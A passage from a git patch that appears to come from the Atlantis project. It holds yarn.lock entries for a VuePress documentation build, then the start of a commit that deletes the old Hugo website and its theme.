"https://registry.yarnpkg.com/to-object-path/-/to-object-path-0.3.0.tgz#297588b7b0e7e0ac08e04e672f85c1f4999e17af" + dependencies: + kind-of "^3.0.2" + +to-regex-range@^2.1.0: + version "2.1.1" + resolved "https://registry.yarnpkg.com/to-regex-range/-/to-regex-range-2.1.1.tgz#7c80c17b9dfebe599e27367e0d4dd5590141db38" + dependencies: + is-number "^3.0.0" + repeat-string "^1.6.1" + +to-regex@^3.0.1, to-regex@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/to-regex/-/to-regex-3.0.2.tgz#13cfdd9b336552f30b51f33a8ae1b42a7a7599ce" + dependencies: + define-property "^2.0.2" + extend-shallow "^3.0.2" + regex-not "^1.0.2" + safe-regex "^1.1.0" + +toml@^2.3.3: + version "2.3.3" + resolved "https://registry.yarnpkg.com/toml/-/toml-2.3.3.tgz#8d683d729577cb286231dfc7a8affe58d31728fb" + +topo@2.x.x: + version "2.0.2" + resolved "https://registry.yarnpkg.com/topo/-/topo-2.0.2.tgz#cd5615752539057c0dc0491a621c3bc6fbe1d182" + dependencies: + hoek "4.x.x" + +toposort@^1.0.0: + version "1.0.7" + resolved "https://registry.yarnpkg.com/toposort/-/toposort-1.0.7.tgz#2e68442d9f64ec720b8cc89e6443ac6caa950029" + +trim-newlines@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/trim-newlines/-/trim-newlines-2.0.0.tgz#b403d0b91be50c331dfc4b82eeceb22c3de16d20" + +trim-right@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/trim-right/-/trim-right-1.0.1.tgz#cb2e1203067e0c8de1f614094b9fe45704ea6003" + +tslib@^1.9.0: + version "1.9.3" + resolved "https://registry.yarnpkg.com/tslib/-/tslib-1.9.3.tgz#d7e4dd79245d85428c4d7e4822a79917954ca286" + +tty-browserify@0.0.0: + version "0.0.0" + resolved "https://registry.yarnpkg.com/tty-browserify/-/tty-browserify-0.0.0.tgz#a157ba402da24e9bf957f9aa69d524eed42901a6" + +tunnel-agent@^0.6.0: + version "0.6.0" + resolved "https://registry.yarnpkg.com/tunnel-agent/-/tunnel-agent-0.6.0.tgz#27a5dea06b36b04a0a9966774b290868f0fc40fd" + dependencies: + safe-buffer "^5.0.1" + +type-is@^1.5.5: + version "1.6.16" + 
resolved "https://registry.yarnpkg.com/type-is/-/type-is-1.6.16.tgz#f89ce341541c672b25ee7ae3c73dee3b2be50194" + dependencies: + media-typer "0.3.0" + mime-types "~2.1.18" + +typedarray@^0.0.6: + version "0.0.6" + resolved "https://registry.yarnpkg.com/typedarray/-/typedarray-0.0.6.tgz#867ac74e3864187b1d3d47d996a78ec5c8830777" + +uc.micro@^1.0.1, uc.micro@^1.0.5: + version "1.0.5" + resolved "https://registry.yarnpkg.com/uc.micro/-/uc.micro-1.0.5.tgz#0c65f15f815aa08b560a61ce8b4db7ffc3f45376" + +uglify-es@^3.3.4: + version "3.3.9" + resolved "https://registry.yarnpkg.com/uglify-es/-/uglify-es-3.3.9.tgz#0c1c4f0700bed8dbc124cdb304d2592ca203e677" + dependencies: + commander "~2.13.0" + source-map "~0.6.1" + +uglify-js@3.3.x: + version "3.3.28" + resolved "https://registry.yarnpkg.com/uglify-js/-/uglify-js-3.3.28.tgz#0efb9a13850e11303361c1051f64d2ec68d9be06" + dependencies: + commander "~2.15.0" + source-map "~0.6.1" + +uglifyjs-webpack-plugin@^1.2.4: + version "1.2.6" + resolved "https://registry.yarnpkg.com/uglifyjs-webpack-plugin/-/uglifyjs-webpack-plugin-1.2.6.tgz#f4bb44f02431e82b301d8d4624330a6a35729381" + dependencies: + cacache "^10.0.4" + find-cache-dir "^1.0.0" + schema-utils "^0.4.5" + serialize-javascript "^1.4.0" + source-map "^0.6.1" + uglify-es "^3.3.4" + webpack-sources "^1.1.0" + worker-farm "^1.5.2" + +unicode-canonical-property-names-ecmascript@^1.0.4: + version "1.0.4" + resolved "https://registry.yarnpkg.com/unicode-canonical-property-names-ecmascript/-/unicode-canonical-property-names-ecmascript-1.0.4.tgz#2619800c4c825800efdd8343af7dd9933cbe2818" + +unicode-match-property-ecmascript@^1.0.4: + version "1.0.4" + resolved "https://registry.yarnpkg.com/unicode-match-property-ecmascript/-/unicode-match-property-ecmascript-1.0.4.tgz#8ed2a32569961bce9227d09cd3ffbb8fed5f020c" + dependencies: + unicode-canonical-property-names-ecmascript "^1.0.4" + unicode-property-aliases-ecmascript "^1.0.4" + +unicode-match-property-value-ecmascript@^1.0.2: + version 
"1.0.2" + resolved "https://registry.yarnpkg.com/unicode-match-property-value-ecmascript/-/unicode-match-property-value-ecmascript-1.0.2.tgz#9f1dc76926d6ccf452310564fd834ace059663d4" + +unicode-property-aliases-ecmascript@^1.0.4: + version "1.0.4" + resolved "https://registry.yarnpkg.com/unicode-property-aliases-ecmascript/-/unicode-property-aliases-ecmascript-1.0.4.tgz#5a533f31b4317ea76f17d807fa0d116546111dd0" + +union-value@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/union-value/-/union-value-1.0.0.tgz#5c71c34cb5bad5dcebe3ea0cd08207ba5aa1aea4" + dependencies: + arr-union "^3.1.0" + get-value "^2.0.6" + is-extendable "^0.1.1" + set-value "^0.4.3" + +uniq@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/uniq/-/uniq-1.0.1.tgz#b31c5ae8254844a3a8281541ce2b04b865a734ff" + +uniqs@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/uniqs/-/uniqs-2.0.0.tgz#ffede4b36b25290696e6e165d4a59edb998e6b02" + +unique-filename@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/unique-filename/-/unique-filename-1.1.0.tgz#d05f2fe4032560871f30e93cbe735eea201514f3" + dependencies: + unique-slug "^2.0.0" + +unique-slug@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/unique-slug/-/unique-slug-2.0.0.tgz#db6676e7c7cc0629878ff196097c78855ae9f4ab" + dependencies: + imurmurhash "^0.1.4" + +unique-string@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/unique-string/-/unique-string-1.0.0.tgz#9e1057cca851abb93398f8b33ae187b99caec11a" + dependencies: + crypto-random-string "^1.0.0" + +universalify@^0.1.0: + version "0.1.2" + resolved "https://registry.yarnpkg.com/universalify/-/universalify-0.1.2.tgz#b646f69be3942dabcecc9d6639c80dc105efaa66" + +unset-value@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/unset-value/-/unset-value-1.0.0.tgz#8376873f7d2335179ffb1e6fc3a8ed0dfc8ab559" + dependencies: + has-value "^0.3.1" + isobject "^3.0.0" + +unzip-response@^2.0.1: + version 
"2.0.1" + resolved "https://registry.yarnpkg.com/unzip-response/-/unzip-response-2.0.1.tgz#d2f0f737d16b0615e72a6935ed04214572d56f97" + +upath@^1.0.5: + version "1.1.0" + resolved "https://registry.yarnpkg.com/upath/-/upath-1.1.0.tgz#35256597e46a581db4793d0ce47fa9aebfc9fabd" + +update-notifier@^2.3.0: + version "2.5.0" + resolved "https://registry.yarnpkg.com/update-notifier/-/update-notifier-2.5.0.tgz#d0744593e13f161e406acb1d9408b72cad08aff6" + dependencies: + boxen "^1.2.1" + chalk "^2.0.1" + configstore "^3.0.0" + import-lazy "^2.1.0" + is-ci "^1.0.10" + is-installed-globally "^0.1.0" + is-npm "^1.0.0" + latest-version "^3.0.0" + semver-diff "^2.0.0" + xdg-basedir "^3.0.0" + +upper-case@^1.1.1: + version "1.1.3" + resolved "https://registry.yarnpkg.com/upper-case/-/upper-case-1.1.3.tgz#f6b4501c2ec4cdd26ba78be7222961de77621598" + +uri-js@^4.2.1: + version "4.2.2" + resolved "https://registry.yarnpkg.com/uri-js/-/uri-js-4.2.2.tgz#94c540e1ff772956e2299507c010aea6c8838eb0" + dependencies: + punycode "^2.1.0" + +urix@^0.1.0: + version "0.1.0" + resolved "https://registry.yarnpkg.com/urix/-/urix-0.1.0.tgz#da937f7a62e21fec1fd18d49b35c2935067a6c72" + +url-join@3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/url-join/-/url-join-3.0.0.tgz#26e8113ace195ea30d0fc38186e45400f9cea672" + +url-join@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/url-join/-/url-join-4.0.0.tgz#4d3340e807d3773bda9991f8305acdcc2a665d2a" + +url-loader@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/url-loader/-/url-loader-1.0.1.tgz#61bc53f1f184d7343da2728a1289ef8722ea45ee" + dependencies: + loader-utils "^1.1.0" + mime "^2.0.3" + schema-utils "^0.4.3" + +url-parse-lax@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/url-parse-lax/-/url-parse-lax-1.0.0.tgz#7af8f303645e9bd79a272e7a14ac68bc0609da73" + dependencies: + prepend-http "^1.0.1" + +url@^0.11.0: + version "0.11.0" + resolved 
"https://registry.yarnpkg.com/url/-/url-0.11.0.tgz#3838e97cfc60521eb73c525a8e55bfdd9e2e28f1" + dependencies: + punycode "1.3.2" + querystring "0.2.0" + +use@^3.1.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/use/-/use-3.1.0.tgz#14716bf03fdfefd03040aef58d8b4b85f3a7c544" + dependencies: + kind-of "^6.0.2" + +util-deprecate@~1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/util-deprecate/-/util-deprecate-1.0.2.tgz#450d4dc9fa70de732762fbd2d4a28981419a0ccf" + +util.promisify@1.0.0, util.promisify@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/util.promisify/-/util.promisify-1.0.0.tgz#440f7165a459c9a16dc145eb8e72f35687097030" + dependencies: + define-properties "^1.1.2" + object.getownpropertydescriptors "^2.0.3" + +util@0.10.3: + version "0.10.3" + resolved "https://registry.yarnpkg.com/util/-/util-0.10.3.tgz#7afb1afe50805246489e3db7fe0ed379336ac0f9" + dependencies: + inherits "2.0.1" + +util@^0.10.3: + version "0.10.4" + resolved "https://registry.yarnpkg.com/util/-/util-0.10.4.tgz#3aa0125bfe668a4672de58857d3ace27ecb76901" + dependencies: + inherits "2.0.3" + +utila@~0.3: + version "0.3.3" + resolved "https://registry.yarnpkg.com/utila/-/utila-0.3.3.tgz#d7e8e7d7e309107092b05f8d9688824d633a4226" + +utila@~0.4: + version "0.4.0" + resolved "https://registry.yarnpkg.com/utila/-/utila-0.4.0.tgz#8a16a05d445657a3aea5eecc5b12a4fa5379772c" + +uuid@^3.1.0: + version "3.2.1" + resolved "https://registry.yarnpkg.com/uuid/-/uuid-3.2.1.tgz#12c528bb9d58d0b9265d9a2f6f0fe8be17ff1f14" + +v8-compile-cache@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/v8-compile-cache/-/v8-compile-cache-2.0.0.tgz#526492e35fc616864284700b7043e01baee09f0a" + +validate-npm-package-license@^3.0.1: + version "3.0.3" + resolved "https://registry.yarnpkg.com/validate-npm-package-license/-/validate-npm-package-license-3.0.3.tgz#81643bcbef1bdfecd4623793dc4648948ba98338" + dependencies: + spdx-correct "^3.0.0" + spdx-expression-parse 
"^3.0.0" + +vary@^1.0.0: + version "1.1.2" + resolved "https://registry.yarnpkg.com/vary/-/vary-1.1.2.tgz#2299f02c6ded30d4a5961b0b9f74524a18f634fc" + +vendors@^1.0.0: + version "1.0.2" + resolved "https://registry.yarnpkg.com/vendors/-/vendors-1.0.2.tgz#7fcb5eef9f5623b156bcea89ec37d63676f21801" + +vm-browserify@0.0.4: + version "0.0.4" + resolved "https://registry.yarnpkg.com/vm-browserify/-/vm-browserify-0.0.4.tgz#5d7ea45bbef9e4a6ff65f95438e0a87c357d5a73" + dependencies: + indexof "0.0.1" + +vue-hot-reload-api@^2.3.0: + version "2.3.0" + resolved "https://registry.yarnpkg.com/vue-hot-reload-api/-/vue-hot-reload-api-2.3.0.tgz#97976142405d13d8efae154749e88c4e358cf926" + +vue-loader@^15.2.4: + version "15.2.4" + resolved "https://registry.yarnpkg.com/vue-loader/-/vue-loader-15.2.4.tgz#a7b923123d3cf87230a8ff54a1c16d31a6c5dbb4" + dependencies: + "@vue/component-compiler-utils" "^1.2.1" + hash-sum "^1.0.2" + loader-utils "^1.1.0" + vue-hot-reload-api "^2.3.0" + vue-style-loader "^4.1.0" + +vue-router@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/vue-router/-/vue-router-3.0.1.tgz#d9b05ad9c7420ba0f626d6500d693e60092cc1e9" + +vue-server-renderer@^2.5.16: + version "2.5.16" + resolved "https://registry.yarnpkg.com/vue-server-renderer/-/vue-server-renderer-2.5.16.tgz#279ef8e37e502a0de3a9ae30758cc04a472eaac0" + dependencies: + chalk "^1.1.3" + hash-sum "^1.0.2" + he "^1.1.0" + lodash.template "^4.4.0" + lodash.uniq "^4.5.0" + resolve "^1.2.0" + serialize-javascript "^1.3.0" + source-map "0.5.6" + +vue-style-loader@^4.1.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/vue-style-loader/-/vue-style-loader-4.1.0.tgz#7588bd778e2c9f8d87bfc3c5a4a039638da7a863" + dependencies: + hash-sum "^1.0.2" + loader-utils "^1.0.2" + +vue-template-compiler@^2.5.16: + version "2.5.16" + resolved "https://registry.yarnpkg.com/vue-template-compiler/-/vue-template-compiler-2.5.16.tgz#93b48570e56c720cdf3f051cc15287c26fbd04cb" + dependencies: + de-indent "^1.0.2" + he 
"^1.1.0" + +vue-template-es2015-compiler@^1.6.0: + version "1.6.0" + resolved "https://registry.yarnpkg.com/vue-template-es2015-compiler/-/vue-template-es2015-compiler-1.6.0.tgz#dc42697133302ce3017524356a6c61b7b69b4a18" + +vue@^2.5.16: + version "2.5.16" + resolved "https://registry.yarnpkg.com/vue/-/vue-2.5.16.tgz#07edb75e8412aaeed871ebafa99f4672584a0085" + +vuepress-html-webpack-plugin@^3.2.0: + version "3.2.0" + resolved "https://registry.yarnpkg.com/vuepress-html-webpack-plugin/-/vuepress-html-webpack-plugin-3.2.0.tgz#219be272ad510faa8750d2d4e70fd028bfd1c16e" + dependencies: + html-minifier "^3.2.3" + loader-utils "^0.2.16" + lodash "^4.17.3" + pretty-error "^2.0.2" + tapable "^1.0.0" + toposort "^1.0.0" + util.promisify "1.0.0" + +vuepress@^0.10.2: + version "0.10.2" + resolved "https://registry.yarnpkg.com/vuepress/-/vuepress-0.10.2.tgz#4f1cd6126619f7a94ab1b08caacdf6d91c52954f" + dependencies: + "@babel/core" "7.0.0-beta.47" + "@vue/babel-preset-app" "3.0.0-beta.11" + autoprefixer "^8.2.0" + babel-loader "8.0.0-beta.3" + cache-loader "^1.2.2" + chalk "^2.3.2" + chokidar "^2.0.3" + commander "^2.15.1" + connect-history-api-fallback "^1.5.0" + copy-webpack-plugin "^4.5.1" + cross-spawn "^6.0.5" + css-loader "^0.28.11" + diacritics "^1.3.0" + docsearch.js "^2.5.2" + escape-html "^1.0.3" + file-loader "^1.1.11" + fs-extra "^5.0.0" + globby "^8.0.1" + gray-matter "^4.0.1" + js-yaml "^3.11.0" + koa-connect "^2.0.1" + koa-mount "^3.0.0" + koa-range "^0.3.0" + koa-static "^4.0.2" + loader-utils "^1.1.0" + lodash.throttle "^4.1.1" + lru-cache "^4.1.2" + markdown-it "^8.4.1" + markdown-it-anchor "^4.0.0" + markdown-it-container "^2.0.0" + markdown-it-emoji "^1.4.0" + markdown-it-table-of-contents "^0.3.3" + mini-css-extract-plugin "^0.4.0" + nprogress "^0.2.0" + optimize-css-assets-webpack-plugin "^4.0.0" + portfinder "^1.0.13" + postcss-loader "^2.1.5" + prismjs "^1.13.0" + register-service-worker "^1.2.0" + semver "^5.5.0" + stylus "^0.54.5" + stylus-loader "^3.0.2" 
+ toml "^2.3.3" + url-loader "^1.0.1" + vue "^2.5.16" + vue-loader "^15.2.4" + vue-router "^3.0.1" + vue-server-renderer "^2.5.16" + vue-template-compiler "^2.5.16" + vuepress-html-webpack-plugin "^3.2.0" + webpack "^4.8.1" + webpack-chain "^4.6.0" + webpack-merge "^4.1.2" + webpack-serve "^1.0.2" + webpackbar "^2.6.1" + workbox-build "^3.1.0" + +watchpack@^1.5.0: + version "1.6.0" + resolved "https://registry.yarnpkg.com/watchpack/-/watchpack-1.6.0.tgz#4bc12c2ebe8aa277a71f1d3f14d685c7b446cd00" + dependencies: + chokidar "^2.0.2" + graceful-fs "^4.1.2" + neo-async "^2.5.0" + +webpack-chain@^4.6.0: + version "4.8.0" + resolved "https://registry.yarnpkg.com/webpack-chain/-/webpack-chain-4.8.0.tgz#06fc3dbb9f2707d4c9e899fc6250fbcf2afe6fd1" + dependencies: + deepmerge "^1.5.2" + javascript-stringify "^1.6.0" + +webpack-dev-middleware@^3.0.0: + version "3.1.3" + resolved "https://registry.yarnpkg.com/webpack-dev-middleware/-/webpack-dev-middleware-3.1.3.tgz#8b32aa43da9ae79368c1bf1183f2b6cf5e1f39ed" + dependencies: + loud-rejection "^1.6.0" + memory-fs "~0.4.1" + mime "^2.1.0" + path-is-absolute "^1.0.0" + range-parser "^1.0.3" + url-join "^4.0.0" + webpack-log "^1.0.1" + +webpack-hot-client@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/webpack-hot-client/-/webpack-hot-client-3.0.0.tgz#b714f257a264001275bc1491741685779cde12f2" + dependencies: + json-stringify-safe "^5.0.1" + loglevelnext "^1.0.2" + strip-ansi "^4.0.0" + uuid "^3.1.0" + webpack-log "^1.1.1" + ws "^4.0.0" + +webpack-log@^1.0.1, webpack-log@^1.1.1, webpack-log@^1.1.2: + version "1.2.0" + resolved "https://registry.yarnpkg.com/webpack-log/-/webpack-log-1.2.0.tgz#a4b34cda6b22b518dbb0ab32e567962d5c72a43d" + dependencies: + chalk "^2.1.0" + log-symbols "^2.1.0" + loglevelnext "^1.0.1" + uuid "^3.1.0" + +webpack-merge@^4.1.2: + version "4.1.3" + resolved "https://registry.yarnpkg.com/webpack-merge/-/webpack-merge-4.1.3.tgz#8aaff2108a19c29849bc9ad2a7fd7fce68e87c4a" + dependencies: + lodash 
"^4.17.5" + +webpack-serve@^1.0.2: + version "1.0.4" + resolved "https://registry.yarnpkg.com/webpack-serve/-/webpack-serve-1.0.4.tgz#d1c83955926969ba195e5032f978da92ef07829c" + dependencies: + "@shellscape/koa-static" "^4.0.4" + "@webpack-contrib/config-loader" "^1.1.1" + chalk "^2.3.0" + clipboardy "^1.2.2" + cosmiconfig "^5.0.2" + debug "^3.1.0" + find-up "^2.1.0" + get-port "^3.2.0" + import-local "^1.0.0" + killable "^1.0.0" + koa "^2.4.1" + koa-webpack "^4.0.0" + lodash "^4.17.5" + loud-rejection "^1.6.0" + meow "^5.0.0" + nanobus "^4.3.1" + opn "^5.1.0" + resolve "^1.6.0" + time-fix-plugin "^2.0.0" + update-notifier "^2.3.0" + url-join "3.0.0" + v8-compile-cache "^2.0.0" + webpack-hot-client "^3.0.0" + webpack-log "^1.1.2" + +webpack-sources@^1.0.1, webpack-sources@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/webpack-sources/-/webpack-sources-1.1.0.tgz#a101ebae59d6507354d71d8013950a3a8b7a5a54" + dependencies: + source-list-map "^2.0.0" + source-map "~0.6.1" + +webpack@^4.8.1: + version "4.12.0" + resolved "https://registry.yarnpkg.com/webpack/-/webpack-4.12.0.tgz#14758e035ae69747f68dd0edf3c5a572a82bdee9" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-module-context" "1.5.12" + "@webassemblyjs/wasm-edit" "1.5.12" + "@webassemblyjs/wasm-opt" "1.5.12" + "@webassemblyjs/wasm-parser" "1.5.12" + acorn "^5.6.2" + acorn-dynamic-import "^3.0.0" + ajv "^6.1.0" + ajv-keywords "^3.1.0" + chrome-trace-event "^1.0.0" + enhanced-resolve "^4.0.0" + eslint-scope "^3.7.1" + json-parse-better-errors "^1.0.2" + loader-runner "^2.3.0" + loader-utils "^1.1.0" + memory-fs "~0.4.1" + micromatch "^3.1.8" + mkdirp "~0.5.0" + neo-async "^2.5.0" + node-libs-browser "^2.0.0" + schema-utils "^0.4.4" + tapable "^1.0.0" + uglifyjs-webpack-plugin "^1.2.4" + watchpack "^1.5.0" + webpack-sources "^1.0.1" + +webpackbar@^2.6.1: + version "2.6.1" + resolved 
"https://registry.yarnpkg.com/webpackbar/-/webpackbar-2.6.1.tgz#d1aff0665c43635ff35672be2f2463d1176bdb6f" + dependencies: + chalk "^2.3.2" + consola "^1.2.0" + figures "^2.0.0" + loader-utils "^1.1.0" + lodash "^4.17.5" + log-update "^2.3.0" + pretty-time "^1.0.0" + schema-utils "^0.4.5" + std-env "^1.3.0" + table "^4.0.3" + +when@~3.6.x: + version "3.6.4" + resolved "https://registry.yarnpkg.com/when/-/when-3.6.4.tgz#473b517ec159e2b85005497a13983f095412e34e" + +whet.extend@~0.9.9: + version "0.9.9" + resolved "https://registry.yarnpkg.com/whet.extend/-/whet.extend-0.9.9.tgz#f877d5bf648c97e5aa542fadc16d6a259b9c11a1" + +which@^1.2.9: + version "1.3.1" + resolved "https://registry.yarnpkg.com/which/-/which-1.3.1.tgz#a45043d54f5805316da8d62f9f50918d3da70b0a" + dependencies: + isexe "^2.0.0" + +wide-align@^1.1.0: + version "1.1.3" + resolved "https://registry.yarnpkg.com/wide-align/-/wide-align-1.1.3.tgz#ae074e6bdc0c14a431e804e624549c633b000457" + dependencies: + string-width "^1.0.2 || 2" + +widest-line@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/widest-line/-/widest-line-2.0.0.tgz#0142a4e8a243f8882c0233aa0e0281aa76152273" + dependencies: + string-width "^2.1.1" + +workbox-background-sync@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-background-sync/-/workbox-background-sync-3.3.0.tgz#87e212715391d2002274f526e77851cfab86ed8a" + dependencies: + workbox-core "^3.3.0" + +workbox-broadcast-cache-update@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-broadcast-cache-update/-/workbox-broadcast-cache-update-3.3.0.tgz#ce4fa56656de5024f567c06f6614e36961c30c0f" + dependencies: + workbox-core "^3.3.0" + +workbox-build@^3.1.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-build/-/workbox-build-3.3.0.tgz#7f3fa9de9714dab318122933b9615a38d94d643d" + dependencies: + babel-runtime "^6.26.0" + common-tags "^1.4.0" + fs-extra "^4.0.2" + glob "^7.1.2" + joi "^11.1.1" + lodash.template 
"^4.4.0" + pretty-bytes "^4.0.2" + workbox-background-sync "^3.3.0" + workbox-broadcast-cache-update "^3.3.0" + workbox-cache-expiration "^3.3.0" + workbox-cacheable-response "^3.3.0" + workbox-core "^3.3.0" + workbox-google-analytics "^3.3.0" + workbox-precaching "^3.3.0" + workbox-range-requests "^3.3.0" + workbox-routing "^3.3.0" + workbox-strategies "^3.3.0" + workbox-streams "^3.3.0" + workbox-sw "^3.3.0" + +workbox-cache-expiration@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-cache-expiration/-/workbox-cache-expiration-3.3.0.tgz#fe9cfde8e8168fa25ff778c6e2eda54181f58506" + dependencies: + workbox-core "^3.3.0" + +workbox-cacheable-response@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-cacheable-response/-/workbox-cacheable-response-3.3.0.tgz#b7d3904fa30baf7da271d73dd2f0da7518378acf" + dependencies: + workbox-core "^3.3.0" + +workbox-core@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-core/-/workbox-core-3.3.0.tgz#3606223514a85a0935550ed15d973c12b12ff680" + +workbox-google-analytics@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-google-analytics/-/workbox-google-analytics-3.3.0.tgz#380ecefc24040db9e191b2789bced19ad61c8ccb" + dependencies: + workbox-background-sync "^3.3.0" + workbox-core "^3.3.0" + workbox-routing "^3.3.0" + workbox-strategies "^3.3.0" + +workbox-precaching@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-precaching/-/workbox-precaching-3.3.0.tgz#471bbc26bd3e92b24fd9d636842cf3f358302bd2" + dependencies: + workbox-core "^3.3.0" + +workbox-range-requests@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-range-requests/-/workbox-range-requests-3.3.0.tgz#9703cb91e9ea9104ed09c545a87e25f41002ddce" + dependencies: + workbox-core "^3.3.0" + +workbox-routing@^3.3.0: + version "3.3.0" + resolved 
"https://registry.yarnpkg.com/workbox-routing/-/workbox-routing-3.3.0.tgz#8184d0159c8c4e4c9dd7a0da08e28e579e372319" + dependencies: + workbox-core "^3.3.0" + +workbox-strategies@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-strategies/-/workbox-strategies-3.3.0.tgz#0681df07ebf4628454aa91317aa87de2d1ded6c6" + dependencies: + workbox-core "^3.3.0" + +workbox-streams@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-streams/-/workbox-streams-3.3.0.tgz#7591e37a08bf65b32d1db076b86900a8a4b7d02c" + dependencies: + workbox-core "^3.3.0" + +workbox-sw@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-sw/-/workbox-sw-3.3.0.tgz#1a9fd728951c76b86225b472f9e37088913c9bc4" + +worker-farm@^1.5.2: + version "1.6.0" + resolved "https://registry.yarnpkg.com/worker-farm/-/worker-farm-1.6.0.tgz#aecc405976fab5a95526180846f0dba288f3a4a0" + dependencies: + errno "~0.1.7" + +wrap-ansi@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-3.0.1.tgz#288a04d87eda5c286e060dfe8f135ce8d007f8ba" + dependencies: + string-width "^2.1.1" + strip-ansi "^4.0.0" + +wrappy@1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/wrappy/-/wrappy-1.0.2.tgz#b5243d8f3ec1aa35f1364605bc0d1036e30ab69f" + +write-file-atomic@^2.0.0: + version "2.3.0" + resolved "https://registry.yarnpkg.com/write-file-atomic/-/write-file-atomic-2.3.0.tgz#1ff61575c2e2a4e8e510d6fa4e243cce183999ab" + dependencies: + graceful-fs "^4.1.11" + imurmurhash "^0.1.4" + signal-exit "^3.0.2" + +ws@^4.0.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/ws/-/ws-4.1.0.tgz#a979b5d7d4da68bf54efe0408967c324869a7289" + dependencies: + async-limiter "~1.0.0" + safe-buffer "~5.1.0" + +xdg-basedir@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/xdg-basedir/-/xdg-basedir-3.0.0.tgz#496b2cc109eca8dbacfe2dc72b603c17c5870ad4" + +xtend@^4.0.0, xtend@~4.0.1: + version "4.0.1" + resolved 
"https://registry.yarnpkg.com/xtend/-/xtend-4.0.1.tgz#a5c6d532be656e23db820efb943a1f04998d63af" + +y18n@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/y18n/-/y18n-4.0.0.tgz#95ef94f85ecc81d007c264e190a120f0a3c8566b" + +yallist@^2.1.2: + version "2.1.2" + resolved "https://registry.yarnpkg.com/yallist/-/yallist-2.1.2.tgz#1c11f9218f076089a47dd512f93c6699a6a81d52" + +yallist@^3.0.0, yallist@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/yallist/-/yallist-3.0.2.tgz#8452b4bb7e83c7c188d8041c1a837c773d6d8bb9" + +yargs-parser@^10.0.0: + version "10.0.0" + resolved "https://registry.yarnpkg.com/yargs-parser/-/yargs-parser-10.0.0.tgz#c737c93de2567657750cb1f2c00be639fd19c994" + dependencies: + camelcase "^4.1.0" From 860cdb866c22d50ae9574053b40ac77aabdf47c6 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 22 Jun 2018 17:27:15 +0100 Subject: [PATCH 46/69] Delete old website --- runatlantis.io/.vuepress/config.js | 2 + runatlantis.io/docs/README.md | 48 - runatlantis.io/docs/contributing.md | 21 + runatlantis.io/docs/faq.md | 28 + website/src/archetypes/default.md | 6 - website/src/archetypes/docs.md | 8 - website/src/config.toml | 22 - website/src/content/_index.md | 6 - website/src/static/.gitkeep | 0 .../src/static/img/atlantis-highquality.png | Bin 21445 -> 0 bytes website/src/static/img/atlantis-logo.png | Bin 21445 -> 0 bytes website/src/static/img/collaborate.png | Bin 13549 -> 0 bytes website/src/static/img/demo-large.gif | Bin 4767847 -> 0 bytes website/src/static/img/demo.gif | Bin 1650880 -> 0 bytes website/src/static/img/locking.png | Bin 15521 -> 0 bytes website/src/static/img/logo-384x384.png | Bin 47594 -> 0 bytes .../static/img/no-need-to-distribute-keys.png | Bin 8889 -> 0 bytes website/src/themes/kube/.gitignore | 1 - website/src/themes/kube/LICENSE.md | 20 - website/src/themes/kube/README.md | 177 -- website/src/themes/kube/archetypes/blog.md | 6 - website/src/themes/kube/archetypes/docs.md | 8 - 
